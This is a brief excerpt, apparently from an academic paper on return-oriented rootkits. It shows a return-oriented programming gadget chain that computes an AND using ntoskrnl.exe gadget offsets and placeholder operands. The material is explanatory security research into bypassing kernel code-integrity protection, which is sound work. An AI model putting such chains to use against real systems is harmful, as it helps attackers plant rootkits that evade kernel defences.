eldorado.tu-dortmund.de/server/api/core/bitstreams/a8583de1-bb8b-4acd-bc05-8490bd7a50a5/content
Return-Oriented Rootkits: Bypassing Kernel Code Integrity Protection Mechanisms
(AND)
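pop ecx             | R: ntoskrnl.exe:D88B  | L: <RightSource>-124
mov edx, [ecx+0x7c] | R: ntoskrnl.exe:C7B4C
pop eax             | R: ntoskrnl.exe:B0AE  | L: <LeftSource>
mov eax, [eax]      | R: ntoskrnl.exe:B13E
and eax, edx        [...]
                         ntoskrnl.exe:D88B  | L: <Destination>
mov [ecx], eax      | R: ntoskrnl.exe:45E4
(Each row is one chain entry: R is the return address of the gadget in ntoskrnl.exe, L is the literal that gadget pops from the stack. The -124 on <RightSource> cancels the +0x7c displacement in the load that follows, since 0x7c = 124.)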
pop ecx ret
mov edx, [ecx+0x7c] ret
pop eax ret
mov eax, [eax] ret
and eax, edx ret
mov [ecx], eax ret
Codebase
AND Gadget